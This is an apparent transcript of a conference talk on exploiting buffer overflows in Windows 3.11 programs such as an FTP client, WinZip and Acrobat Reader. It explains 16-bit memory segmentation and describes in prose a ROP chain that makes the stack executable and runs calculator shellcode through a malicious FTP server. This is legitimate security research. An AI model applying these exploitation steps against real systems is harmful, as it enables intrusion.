 Alright, well next up we have Jacob Thompson giving a talk on exploiting overflows on Windows 3.1, which is personally one of my favorite OS's from back in the day, and I think this will be really interesting. Please welcome Jacob. Alright, so thanks everybody. So this is called from far and near exploiting overflows on Windows 3.x, or in my case 3.11. So the title, if it doesn't make sense now, it will once I get into the C code and so forth. So and we're here at Torcon 20. So I actually did this as a side project at the office over, I don't know, three or four weekends. So and it's kind of relevant because what I do day to day is we do high end custom security assessments and if there's a custom protocol every now and then like a custom operating system, custom programming library, like tearing the stuff apart and stuff I get to do every now and then. And this was just another case of that. So white box security assessment, it's kind of what this is, although I guess it was black box of three 1990s era internet applications that I got into and we'll go through all the details later. But specifically I work at ISE or independent security evaluators where I do this kind of stuff sometimes. And we're also running the IoT hacking contest in the room next door. If anybody wants to get into that, it's another semi obscure set of platforms. So if you're here, you might be interested. So some personal background. I've been doing this for six years and specifically in security consulting. I've counted about 100 engagements that either assessments, reassessments that I've had some major role in particular interests kind of fit right with this reverse engineering cryptography design flaws, which are kind of an interesting thing because like a scanner can't find a design flaw oftentimes where I have some co workers out here that are dealing with some of those right now. And this kind of retro interest because I didn't do programming or hacking on these platforms when they were popular, but I did use them and it's interesting to see how that worked at the time where obviously we wouldn't have understood how. So that's kind of interesting as well. So getting into this topic of 16 bit overflows, well first I think it's kind of interesting and a little amusing like in popular culture, I think 16 bit and 8 bit to a lot of people have something to do with like really tinny sound and pixelated images. But of course in programming, it has nothing to do with that. In fact, 16 bit color is a good thing, right, particularly in the days of Windows 3.1. So that is a little amusing to me. Just a little diversion. So specifically I have a virtual machine here with Windows for work groups running. If we switch over into that, we can click around and see what I have installed. I took a look at several of these programs here. Some of them successfully, some of them unsuccessfully at actually finding anything that I could exploit in time. So we had Acrobat Reader back then, just like now, and probably a lot faster and user friendly. MIRC was one I looked at. I know MIRC is kind of rampant for security holes. I'm not sure that buffer overflows necessarily were one of them and I'm not sure why. Potentially they were using C++ with a good string library or something. Most of the problems I found in the three programs I got were pretty trivial, like taking a file path that's too long, like really obvious things. Real player existed back then. I actually can't get it to run because it requires 256 colors and I'm not in that mode with the drivers that are installed. So Yudora Lite was an email client. That one, I got into some weird things with a POP protocol and SMTP, but I didn't get anything. I think I was overwriting a null byte or something or prematurely terminating a string. It didn't seem to look overflow worthy at the time. So WSFTP was a popular FTP client. That was the most amenable one for an interesting exploit that I came up with. And WinZip, of course, at least up until what, like Windows 2000 or XP, that was a pretty popular tool since it wasn't built in. And then kind of the standard Windows thing. So TCP IP stack, of course, was an optional third party component at the time. And there was one on the Microsoft FTP server, if you can supply an ethernet driver. For dial up, you're kind of on your own, which you most likely would have been at the time. All right. I also have what became Visual Studio, or wasn't even necessarily branded that way at the time. It comes with a good set of the IDE debugger and so forth. Some documentation that I think is actually higher quality than what MSDN is today in terms of here's a function, these are the parameters it takes, and this is what it does. So we'll get into that a little bit later, but I think it's actually better than what you can find today because a lot of that is devolved into discussion forms where it's somebody, here's an opinion, it's right, here's an opinion that's wrong, somebody else says no, that's absolutely the wrong way. Here's some third party library you should use and so forth. All right. So getting acquainted there. So how did I get into this? Why did I get into this? So the IoT stuff is a little bit relevant. We did some really weird things there back in 2013 when we did our first round of our own exploits. One of those was some, it's all public, so an ASUS router and then some other similar brand names to that. That market is interesting. A lot of them buy like a development kit off the shelf with like pre-made firmware and they just kind of brand it to their version. So we found a background service that ran on some of these routers that was, when you first booted it up, it looked around at what Wi-Fi channels were being used near your device and tried to pick one that was free. So like 1, 6 and 11 for 2.4 or whatever. One of those services also listened on the network for some reason. We think they were trying to do like a local host bound socket, but they had it listening everywhere and it was ARM. ARM and MIPS and a bunch of other architectures we got into and made overflows for. And a lot of those share the same property as what I'm going to get into here is if you're trying to invent buffer overflows at the time, those are somewhat challenging architectures to start with, where 32 bit x86 is a particularly easy one. And I'm kind of wondering historically if that's part of the reason why things happened in the order they did, but we'll see. So one of the things in particular, I got into thinking about this after working with some of those unusual payloads that we created is if you search the internet, like obviously at the time, people must have written exploits, right? If you search the internet for things like Windows 3.1 shell code, you get pretty useless results. In fact, it seems to find things like shell code for an exploit for some application where that application version is 3.1. It has nothing to do with the OS. And every now and then they will allude to a program that someone exploited on a 32-bit OS, but it's also available for a 16-bit OS. But they could not find working shell code, working exploit, or anything. I think now I'm on page three or four of these search results. So if anybody is interested in looking at the white paper that is like 20 pages and goes through this in much better detail, I guess page rank is still a thing. So that could help bring it to the top if it's interesting and you link to it or put it on social media or something. Same idea for Windows 3.1 buffer overflow. You get this chat server version 3.1, like the OS doesn't even float to the top. So I was thinking about this, and so why has nobody written about this? And I kind of thought of a couple reasons, potentially valid, potentially not, but they're interesting to think about. One last thing, though, the relevance of this. Obviously, this is not going to be a very useful skill to put into a metasploit and take to penetration test or anything, right? But I thought this was a little bit interesting. This was 2015, and they had some kind of kiosks or something that had been developed and deployed in the 90s at some point, and they were still existing and they went down. It had something to do with weather in a French airport. So just alluding to the relevance a little bit. So proving that an overflow even exists or would come about, I alluded to that before with the applications. But even like you think Windows 3.1, you think some standalone desktop, and a lot of them were probably the majority. You also had like Netware or something, and potentially even late in this if you bought like a used computer in the mid-90s or something, you could easily have like an early Pentium learning Netscape and trumpet winsock or something. Or Internet Explorer 5 was available, interestingly enough. Imagine trying to write the JavaScript interpreter for that and have it compatible in both 16 and 32. So one could a buffer overflow situation arise. Here are the few that I came up with that I'll exploit. So FTP Client, I just have a local FTP server running to test with this. It ends up, we'll get into it later. So anything dealing with file names, I think a lot of people assumed that reading in a file name is going to be about 256 characters or something, and when you get beyond that, things tend to fall apart pretty quickly and at least two of the applications I show here. So this is the FTP Client. This is Adobe Reader. So this one has to do with hyperlinks that end up being too long that we'll get into. And this one was Winzip. So that's just a zip file, but we'll get into parsing UU encoded files that have a file name inside and that kind of breaks pretty quickly. So the interesting part here, I rediscovered all of these exploits, but it turns out they all had CVE numbers for somebody finding them and building an exploit in the 32-bit version in like the mid 2000s or late 90s. So I was rediscovering things that are like so blatant, trivial overflows that someone found before, but they didn't necessarily extend it to 16-bit platforms at the time. So I was talking before, why wasn't this talked about earlier? So let's get into that, my conjectures about that. So maybe it wasn't interesting. Let's picture, it's like you're writing, smashing the stack for fun and profit. It's the mid 90s, what is more interesting? You are on a low-end Windows machine and you are attacking some Solaris server or the other way around, right? Maybe this just wasn't interesting at the time. There were far better ways to go after some low-end Windows machine than some what at the time would have seen like a far-fetched scenario if you're gonna have a malicious server and they're gonna dial into the internet and open this client in this exact order. And of course, a lot of that is more plausible now. So maybe it just wasn't interesting at the time. Why attack a desktop when you get a server on a T3 or something? Maybe it was just so obvious and nobody thought it was even worth writing about. I don't think that's the case, but I guess it could be, but I doubt it. And then the third one that I'm going to say is probably true, or the last one. So it could have just been that by, so at the time that this was a common platform, right? Mid 90s, 94, 95, 96, maybe it depends on how well to do you were with buying like an NTFOR machine or something. So I'm going to say, and I'm not sure if this is 100% true and it'll be interesting to do more research behind it, if you look at publicly available exploitation techniques, right? In the mid 90s, when people might have cared about this, they just were not advanced enough to do rot chains and disabling ASLR or getting around ASLR, disabling memory protection, no execute, which I'm going to show some of that exists in a very weak form by accident. And I'm going to predict that maybe those techniques just weren't publicly known enough at the time for people to build the exploits that by standing on the shoulders of giants I was able to do in a couple of weekends. Maybe, so we'll see, all right? So how about we do an overflow just to show that it's possible here. I'm going to do a live demo rather than what I have reserved in the slides. Let's kind of build one on our own, right? So if we open Notepad, which is probably one of the least changed applications since this time, so a UU-encoded file, it has begin permissions file name, a bunch of UU-encoded data, which is superficially similar to base 64, but uses characters that are more dangerous and then end at the bottom. So we can build, like our mode here, let's say it's 664 for UNIX permissions and then a file name will make it longer and then we won't even need any data because it'll crash before then. So let's get some malicious stuff here. I've got a lowercase one in there. All right, kind of like the classic demonstration, right? So that's way too long. Let's save it as a UU-encoded file that will open in Winsip, save and let's go in and open it. It's shareware. I guess that's not really a thing anymore because of mobile platforms, like there's no friction to buying something. So we'll open it and we have a problem. So it gives an error message first that you can't read and then when we hit okay, it crashes. So the interesting thing here, on a 32-bit platform, when you do this kind of trivial AAA exploit, where do you expect it to crash? 4141414141, right? We will see that it crashes on the instruction before that because of how the memory segmentation works. So I'll get more into that later. So one of the interesting things you can do is the crash reporter that comes in later versions of Windows, the file name is still Dr. Watson or Dr. Watson NT or whatever, or at least it was for a long time. That actually is a crash logging application that's built in here. So if we run that and have it minimize when we do the crash, it will intercept when Windows triggers a GPF and log a lot more useful information about it or not, we have to reboot because there's some lock that is still acquired somewhere. Thankfully, it takes a lot less time than it would have done back then. A little video glitch that resolves itself. So the crash reporting here and then do this overflow. And now we can put some stuff in here that's gonna put in a log file and then we can browse to that file. And that's an old one, let's go to the bottom. So when that program crashed, it logged a bunch of information here. So September 16th, that's today. So registers logged. So 32 bit will be EAX, ABX, so forth. Well, this is 16 bit, so if that wasn't already obvious, the E wasn't there back then and it was added as a retrofit for 32 bit. So BP is an interesting register that kinda looks awful like the pattern we just ran into. So BP was overwritten. And then some things that aren't quite as relevant today. So we have these segment registers that I'll get into. So CSDS and SS for code, stack and data. And an interesting thing here, look at the permissions on those segments. So the code is executable and readable. The data is readable and writable and the stack is readable and writable. So if the code is not writable and the stack is not executable, this kind of sounds like the high watermark for buffer overflow defenses on Windows until XP service pack three when no execute stack came back. So that's an interesting point that I'll get into the details a little bit. So if your code segment and your, if you don't have a code segment and a data segment overlapping, then you have some form of data execution prevention by design or by accident. So that's an interesting point. And the other thing that's kinda ring similar today, you could have a 16 bit OS running on a 32 bit processor just like you have 32 bit OS running on a 64 bit processor. The kernel has to know this is actually 32 bit hardware. It doesn't just run the same thing. So those EAX and so forth, those still exists, the top 16 bits are all zeros because they're not really being used so much. The stack you can see actually has some high order bits in there and that would be likely the result of some math going on, paging. So virtual memories is all there so it could be changing things. Stack dump here. So look at SSBP one at five seven, 401, 401, other information. They kinda give you some code that where it thinks the program's running right now. So that's some interesting stuff just coming from Dr. Watson. We're not even a debugger or anything else yet. So the other demo I have before we get into actually constructing an exploit. I have an FTP server running on this machine where I've put an anonymous directory on here and I've just put a file name in there that's just way too long for a Windows 3.1 program to even handle. So it's just the alphabet but creatively done so you can figure out where you were like you were using some of the Metasploit tools that kinda get creative with that. So what happens if we open the FTP client and just browse that directory and try to open that file and for interesting purposes, let's do that in the debugger. So one of the things that gets interesting here, the IDE and the debugger weren't even written by Microsoft. They were a much smaller company back then. Like in the stock market they were growth, not value or whatever. So the debugger is not even written by Microsoft. So we can open an FTP client here and you can see if you think when the bug or when bag is primitive, well look at what they dealt with back then. So new mega technologies apparently wrote it. It's all slightly menu driven but in reality they're a bunch of commands you can type in to get around much faster. So somewhat GUI based but in text mode but running over top of your Windows desktop at the same time, so a weird combination. So if we start the program with G, let's open it. I have two FTP servers running, one that's a script specifically designed to exploit this and one that's just a normal FTP server. So we'll put it on 21, anonymous. Go in here and we have a problem. As soon as we go into that directory it crashes, traps you into this debugger. So we can look what's in the registers and the current instruction. So AX, BX, CX and so forth. The base pointer is overwritten with some ASCII characters, five, three, seven, three. Those are valid. The crashing instruction is a return. And this is what I was alluding to earlier is it's going to crash on the instruction that attempts to return to an invalid address rather than overriding EIP and crashing there because it's an invalid address. So that is weird. We can look at what's on the stack here and I'll get a lot more into the details here in just a minute. So it's a bunch of ASCII looking values. Let's do those in ASCII and there you go. So interesting thing here when it was creating that directory listing on the screen it was trying to put the date and time in there not even a separate columns just with like a vertical bar to separate them. And we don't get a bunch of contiguous bytes here that we can control for looking at Rob James, Shell Code and so forth after that because the date is in the middle. So what I ended up having to do and I'll get into this later is get created with jumping over that region that had the date and writing an FDP server with a path so long you can't even create a file with that name on Linux. And that's why we need a custom implementation of FDP. So I'll get back to the slides but obviously these crashes are here they're doing bad things that are worth further investigation. I have kind of a more static version of it here. I skipped this a little bit but when you're writing an overflow on 32 bit like what's kind of the basic like trivial no ASLR, no depth overflow you would do. You have a program presumably in C maybe C++ that takes untrusted input, command line, environment variables, standard in, a network socket, a file on disk somewhere that's untrusted tries to stash them on the stack somewhere so stir copy, scanf something from the overflows I ran into I'm pretty sure those functions were all over the place and you write too much on your local variable or local buffer than it can hold what happens to be there as the stack grows down and you write upward the return address is there you overwrite it with address of code you've written like shell code or something slightly more complicated like a very useful instruction like jump to the stack. A vulnerable program trivially might look something like that. Ask for input and just write it into a buffer without paying attention to what was passed versus how many you can hold. We'll very quickly see that that doesn't work and the next 10 minutes or so we'll get into why based on memory layout. Complications of exploiting on a 16-bit platform. So let's think about how we deal with memory on a 32-bit or even 64-bit platform so a lot of things that if you read the C standard if you're writing in C there are a lot of restraints or restrictions on what you're allowed to do with pointers that you can usually get away with anyway sometimes. So if you think about GCC and being cautious with pointers there's this idea of aliasing or strict aliasing but that's pretty much it for most purposes. And if you think about pointer one and pointer two if you wanna compare them to see which one is greater that works. If you want to add a value to a pointer you're pretty much gonna get a valid address. Potentially there's integer overflow but that's about the only complication. A pointer just happens to be a 32-bit value that points somewhere that you can do all the normal arithmetic on it and it's a single linear memory map. If you use this kind of simple memory model which ends up being called tiny. A 32-bit machine accesses 32 bits of memory or 32-bit memory addresses. So two to the 32 ends up being two squared times two to the 30th which is four gigabytes. You can do that pretty easily. And a 64-bit machine assuming there are new hardware constraints but obviously still exists could address two to the 64th. And a 16-bit machine with this simple straightforward memory model zero to two to the 16 minus one could address two to the 16 bytes of memory. How much is two to the 16? 64K. Even when x86 was being designed that was already too small. So they could increase the size of the registers or they can do like bank switching or what they ended up doing is segmentation. And people that programmed this at the time there are a lot of horror stories. One of the inspirations for this if you've seen the MSDN blog old new thing by someone who's been at Microsoft for a long time there's a lot of horror stories about the types of things you would have to do when what I'm about to show enters into your program. Registers you deal with on 32-bit kind of been through this already. 16-bit they're all smaller they're 16-bits instead of EIP you have IP instead of flag E flags you have flags and so forth. But the other registers that also exist on 32-bit the segment registers exist and you care a lot about this is assembly programming that kind of creeps its way when you're working with C when you're doing this development. So first of all the segmentation. So every 16-bit program has to have a memory model chosen by the programmer. And every one of these is about tradeoffs between code size and speed and size of the program. So one of the aspects of a segmented architecture is that rather than one giant pool of memory that you number from zero to number of bits minus one you have to go through a segment that then in hardware is mapped to some linear region of memory based on RAM and ROM how many memory chips you have and so forth. So even though the nice normal size of a memory address you work with is 16-bits in reality they're 16-bit offsets and some zeroed of large number of segments that you can work with at any given time. So this will be a program that is small or medium and what that means is that code is stored over here local variables are on the stack so they're here. Global variables we put in the same region. So what are the good things? What are the bad things about this? So this means you can have up to 64K of code because that's two to the 16th and your size of your stack and data combined can be up to 64K. And in like a small helper application like Notepad or something that might be totally fine. If it's something like IE5 I highly doubt they were able to do this trying to write a JavaScript interpreter that deals in 64K overall. If anyone is done programming with Masm or ML like oftentimes you'll write a program and it'll just spit a bunch of syntax errors about you and they're resolved by putting the word offset in and this is where it comes from. It's clarifying to the assembler that you're not trying to, are you trying to use an address into the current segment or a 32-bit address which consists of a different segment number in an offset. This is a lot, this is complicated to try to explain live and verbally. I have the white paper on the website that goes through all the different memory models. So if you think about it, if 64K is not enough to store your combined global variables, local variables, you can split them into two different regions. What are the good things about that? Now you have 64K of stack, 64K of data. Now imagine passing a local variable to a function that accepts a pointer to a buffer that it's gonna write something into. That function either needs to know whether it's on the stack or in the data segment by taking a far pointer or you need to have two different functions, one that takes near and one that takes far and does the right thing and both of those concepts creep their way into the standard library. So I have another program to show here that's not an exploit but going into this IDE. I have something that just takes the addresses of various things so that we can look at how the segment numbers are created and how they change at runtime. So it's a fairly straightforward function that'll get more into some of the things here. We use sprintf to basically printf to a message box since there's no standard IO. So the things I'm taking addresses of are this FGlobal which is a global variable I declared as far and then another global variable that I just did normally, a static variable inside the function and just a plain local variable that will be on the stack. Then I took a few function pointers, one of WinMain which is this program itself and by casting it to far we can get the segment number and then message box which is a library function from the user library or user32 today and local alec which is a function from the kernel library or kernel32 today. So if we run this it basically stuffs all this into a big string and gives us a message box so there are a couple of things we can observe here. If we run it, here we go. So it's segment colon offset, the far global because it was declared as far it gets its own dedicated segment. So that particular variable is allowed to be its own 64K memory region without interfering with anything else but if you wanna pass the address of that to other functions that wanna write something into it or read from it, they need to accept a far pointer or otherwise it'll get truncated to 16 bits and offset from the wrong place. The regular global variable got put into this combined code plus data segment or what the documentation will call the default data segment. So global, static and local all share the same segment number. So you can interchange those addresses, the 16 bit addresses. If a program was expecting data and you give it a stack, it will work just fine. The code at the bottom, so when main, it's offset as zero makes sense, it's a very first function in this object file when it builds it. Message box gets 047FAB5D and local alloc gets 01170543. So what those numbers at the bottom end up being the code segment of this particular executable when it was loaded was 24A7, the code segment of the user library is 047F, the code segment of the kernel is 0117. The interesting thing is if we run this program multiple times, what changes and what doesn't. So we can do that if we want. And what happens is message box and local alloc, they stay the same, those are in an external library, everything local to that program changes pretty much. It's not random, what I call a very weak ASLR, it's probably predictable, and it would depend on how many programs the user's running and what order they started them in. But they do change every time for everything local to that program. So it's not an obvious pattern to what's happening, but the message box and local alloc stay in the same place. So what you have is like an inverse ASLR, where the program moves around and this library stay in the same place. This is the reverse of the easy ASLR that you just kind of flip on with like GCC or any modern build system out of the box, where the program stays in the same place, the libraries move around, unless it's a pie. In this case, it's the other way around, the program moves around the library stay in the same place. Think of a really obvious reason why it has to be that way. And it's multiple copies of the same program running because there's no memory protection. So what I'll end up doing in a little bit is chaining the Rop gadgets that aren't even part of the current process. So that's weird, but it works. So flipping back to the presentation, the distinction here is what you're used to is on 32-bit code, the segmentation is still there, but all they've done is set code data stack and extra to all be zero to the entire memory space. So this is called the tiny model, which doesn't seem tiny on 32-bit, but it just means the size of your register that's the size of your memory space. You can do tiny on MS-DOS programs, you can't do it very well on Windows programs because the Windows libraries themselves are too big to fit in 64K. So the complication this makes that I showed a little bit of already. So a pointer. If you could make every pointer be the entire segment address in the offset, what are the downsides of that? One of them is code size, so every memory address takes twice as many bytes or twice as many instructions as it would otherwise. And the other part is one of the particularly slow things on the early x86 processors, like a 286 or 386, is changing the value of a segment register because that's when they have to look at the, if it's 386, look at the paging, the virtual memory, look up a bunch of tables that have been set up by the operating system to determine is this your segment and what do I need to load as far as it's base and limit. So they wanted to avoid changing the value of ES, changing the value of ES and so forth. So a near pointer gives you those advantages as you can just, here's a variable, let's take the address of it, it's a pointer, it's good. The problem is if a near pointer is dereferenced out of context, this is a disaster, right? It's like having a cluster of multiple machines and like trying to use a pointer from a different machine that's not even yours or like trying to process a core dump from the wrong version of a program, right? It's just a disaster. What this ends up doing is they end up having to make a trade off. So some functions like fread, it doesn't make a whole lot of sense to create one version that only works for 64K and another version that doesn't. So sometimes they just say, here's one version, you have to use this kind of pointer. In other cases, they create different variants of functions for what size of data you're dealing with. So that's another thing we can look at in here. Your documentation. So what's a function that would have to deal with these complications a lot? So sturdup is one. That on a flat memory model is pretty simple. It takes a pointer to a string, it allocates using malloc, enough memory to hold a copy of it, makes the copy and returns to you the pointer. And then later on you will free it. But when you add these complications, you need three versions. So the first one is the one you're used to, what it does is depending on the build options used to compile your program, it does the right thing. So if your program is tiny, everything would be near. If your program is huge, everything ends up being far. And then in between it depends on the particular context of the memory model you've chosen, the details of which are in the white paper. Then they need another version, fsturdup and farsturdup. And what these are doing is they're giving you a different kind of pointer as the return value. They take a far pointer in both cases. But when they call malloc, they end up being different versions of malloc because there's more than one heap. So there's a near one, a far heap and it will allocate from the correct place. And what you have to do as a programmer is remember when you free where you got the pointer from. This somewhat reminds me on, even on Windows programming today, if you don't link to the C library correctly, you can have a program and a DLL that are linked to slightly different versions of MSV cart. And in this kind of situation, it's malloc is one version and free is a different version that can be another disaster that happens. This somewhat reminds me of when you're in C++ and you're dealing with const. There's a const int star and int const star or an int star const. And the third one is a completely different meaning than putting it in front. So a char far star means that the return value is going to be a segment and offset of 32 bit value. The far that comes after the star is saying that that function is going to have a 32 bit address so that it can be called from anywhere in the program as opposed to a local function, like a static one that can only be called from the current file. So making a function static in a 16 bit program is going to trigger a bunch of compiler optimizations that aren't necessarily relevant on 32 bit because static guarantees it won't be called from outside or unless you have a function pointer. Both of them, as I said, take a far and give you the right kind depending on what you've asked for. So how about functions? As we just got into a function, you can have a far function that returns a near pointer, a near function that returns a far pointer or the other two cases and so it's two squared, so four possibilities. Where this becomes relevant, so a far function means that when it is called, the function calling it may not be in the same code segment as that function. So when it gets called, that function, the caller needs to know the entire 32 bit address. When you return, you need to switch the code segment back. So that means that the size of a return address on the stack depends on the context in which a function was called. Thankfully, it is the same depending on how that function was declared. So sometimes this might be suboptimal. If you have a far function that has to be in the same code segment, you swap out the register anyway, but it works. It's just more flexible. Why this is relevant? Well, in a buffer overflow, a return address is something we'll particularly care about. How does this affect exploitability? So as I alluded to, this is kind of like 1993, very weak versions of ASLR in depth. ASLR meaning that you can't assume where the stack is, and it's the upper bits that are different rather than the lower bits. You can't assume where the code segment of the current program is. You can't assume where the common libraries are, so that's what I'll do. And depth meaning you can't just put shell code on the stack and call it or jump to it. You'll have to mark the stack as executable first. So I'll have to speed up a little bit. ASLR, no memory protection, a segment is unique across all processes running. It can be bypassed pretty easily by just knowing where these very large libraries with lots of useful things, like loading a segment register, finding where the stack is, and so forth that you can call from anywhere with Rop. This version of depth, you can't have an executable code segment. What you can do is have a code and data that point to the same place so that you can just access it on a roundabout way to write to a place that's also executable. So wait a minute. The problem, why wasn't depth there the whole time? When you switched to 32-bit and you go to the tiny memory model, you can't do this because you've implicitly created a situation where everything that's executable can also be accessed through the data segment. So paging can do read write or read only, but it can't do executable but not writable until they added that in the processor like a Pentium 4 or something. Calling conventions and other complication. So the one we're used to, Cdecl, when you call a C function, the arguments start at the end and it passes them to the beginning. What's the reason for that? Variable number of arguments. A function is expected to figure out how many there are by looking at the first one. So the first argument better be somewhere that it knows where it is. So if you pass them in reverse order, that will happen. 16-bit code on Windows tends to use a different calling convention which is Pascal. One of the differences is you pass arguments from left to right so they end up upside down. And the other part of it is the callee is responsible for popping everything off the stack in terms of the arguments as opposed to the caller. Why would they do that? So by moving the stack cleanup code from the caller to the callee, the code gets somewhat smaller and it was small enough to reduce the number of floppy disks that the first version of Windows needed to fiddle on or something along those lines. Might be an urban legend, but the code size part is true. Kind of done this already. So this is just some screenshots of what we did. We were in the debugger, you see 4.1.4.1 everywhere. Now building the rock chain. So what we've observed and what we need to do. So the problems we have is our shell code is on the stack. We don't know the segment selector of the stack. So we need to figure that out. So thankfully there are rock gadgets that we can find. They'll take SS and put it somewhere convenient. The other part we need to do is get a different view of the stack, but marked as executable. And thankfully there's a nice function in the API. If I get in the right section, I close the entire VM. So there's a function called AlecDS2CSAlias, which is basically the virtual protect of 1993. So with time it's a little short, but I can show you in the white paper, I have a nice diagram that goes through all of this. So what we end up doing, this is custom made for the FTP client. So the first thing we do is overwrite BP. You can actually somewhat hard code offsets to the stack, assuming the user uses the program in the same way that you did, because all the randomness or uncertainty is in the selector, not the offset. So we end up doing that. And this move AXSS, we're gonna pull the stack selector and put it into AX, and then put it somewhere convenient, which is an offset of BP. Get that stack selector and pass it to AlecDS2CSAlias with some complications to deal with null bytes. What that function will return is a different segment selector that when loaded gives you the same view as the stack, but marked as executable, so we can hard code the offset to the shell code, but now we have the selector done dynamically. And finally this push AX, push BX, and don't pop them and then return. You've loaded an address on the stack and then jumped to it as a far pointer. So this is a more long-winded version of that. So this goes explicitly through the individual gadgets I found, the way I found them was dumping the code segment of user and kernel to disk and then just writing a Python script that looks for a return and then looks backward for something convenient. So that's exactly what we do. Reposition the stack, figure out where SS is and put it somewhere good, pass it to this function that's the virtual protective 1993, and then jump to that offset BX, which is the offset we know AX is, this view of the stack is executable that we just obtained dynamically. So the other part that we need is shell code, which is comparatively easy. I just did a calculator one, so all I did was figure out the when exec, get the address of that in the same way, zero to eight F, and just make a shell code that puts when exec on the stack and then jumps to it. The only complication is the Pascal stuff, you have to do it backward from what you're used to. So a more pre-done demo here shows that it actually works. Oh, it's a video. A little bit glitched, but it works. So this is connected to a Python script that I wrote specifically for the purposes of serving as a malicious FTP server that deals with all the binary characters the correct way and so forth. And there you go, it crashes and the calculator opens. So that CVE is where somebody else found it in the 32-bit version, so I didn't wanna claim, it's technically not a new, it's not a new vulnerability, it's a new exploit, I guess. So I've got to wrap up here, but some static images showing the link overflow and Acrobat Reader also works. That one, unfortunately, hangs the machine if you control delete to the blue screen of death and then get rid of it and then you get control back and the winds up one ends up working as well. So the interesting thing, like trying to get rid of that message, that would be a whole diversion that I didn't even get into because you have, it's possible that's a modal dialogue, what if it hangs the machine and you're trying to do a remote shell or something, like imagine trying to do a remote shell on Windows 3.1 in the first place, much less maliciously. So just wrapping up here in case there are any questions, I'll be over in the IoT Village after this since I'm bubbling up against the 50 minutes. Somewhat future work you could, unfortunately with 64-bit, this just became not relevant, but what about 16-bit programs running on a 32-bit OS? What if you have XP with ASLR? How does it do ASLR on 16-bit programs? Does it even attempt that? If you compromise one, are you sandboxed inside NTVDM or can you do something much worse, like exploit NTVDM, which is relevant and has happened in local exploits? Embedded devices, I don't think there's too much 16-bit x86 out there, you could have a really old security system or something that is still out there. Industrial stuff is definitely exists. And then the other more reflective question, what is right under our noses now that the exploit techniques just don't exist yet? So when I wrote this last year, meltdown had not come out yet. So there you go. Right. So the white paper has far more interesting details, all the technical stuff. If you go on our website, you can find it. And I will be over in that room so I can let the next speaker come in at the IoT Village for any questions anyone has. Otherwise, I will wrap up.